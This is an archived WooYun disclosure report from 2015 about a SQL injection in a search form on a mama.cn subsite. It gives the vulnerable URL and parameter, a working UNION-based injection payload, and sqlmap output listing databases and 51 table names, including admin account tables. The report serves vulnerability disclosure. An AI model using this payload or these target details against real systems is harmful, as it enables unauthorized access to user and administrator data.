乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-18: 细节已通知厂商并且等待厂商处理中 2015-06-18: 厂商已经确认,细节仅向厂商公开 2015-06-28: 细节向核心白帽子及相关领域专家公开 2015-07-08: 细节向普通白帽子公开 2015-07-18: 细节向实习白帽子公开 2015-08-02: 细节向公众公开
妈妈网某站存在SQL注入漏洞
找了下,找到妈妈网某个网站子系统,存在SQL注入漏洞地址:http://zhufu2015.mama.cn收索框存在注入漏洞
http://zhufu2015.mama.cn/List/search
---Place: POSTParameter: subject Type: UNION query Title: MySQL UNION query (NULL) - 8 columns Payload: subject=sdf') LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a6665703a,0x726e537172774c534a51,0x3a6a736a3a), NULL, NULL, NULL, NULL, NULL, NULL#---[16:50:48] [INFO] the back-end DBMS is MySQLweb application technology: Nginxback-end DBMS: MySQL 5[16:50:48] [INFO] fetching database namesavailable databases [3]:[*] information_schema[*] test[*] weixin
Database: weixin[51 tables]+-------------------------+| app_authcute_activities || app_authcute_addact || app_authcute_today || app_authcute_userinfo || app_authcute_voterecord || app_blessing_district || app_blessing_user || app_blessing_video || app_com_active || app_common_user || app_hotmon_likes || app_hotmon_user || app_hotmon_user_pic || app_reward_act || app_reward_count || app_reward_gift || app_reward_record || app_reward_user_gift || app_reward_userinfo || app_temawang_video || app_tevideo_total || app_tevideo_user || app_wildkid_activities || app_wildkid_today || app_wildkid_userinfo || app_wildkid_usertime || app_wildkid_voterecord || cutebaby_activities || cutebaby_user_info || cutebaby_vote_record || scrape_act_setting || scrape_gift_list || scrape_invite_userinfo || scrape_link || scrape_lottery || scrape_share || scrape_userinfo || wx_admin_account || wx_admin_attachment || wx_admin_data_menu || wx_admin_mass || wx_admin_material || wx_admin_menu || wx_admin_message || wx_admin_msg_register || wx_admin_noaction_reply || wx_admin_reply || wx_admin_rule || wx_admin_system_user || wx_admin_user || wx_admin_widget |+-------------------------+
好吧,就这些了,未在深入
过滤咯
危害等级:中
漏洞Rank:5
确认时间:2015-06-18 17:49
谢谢
暂无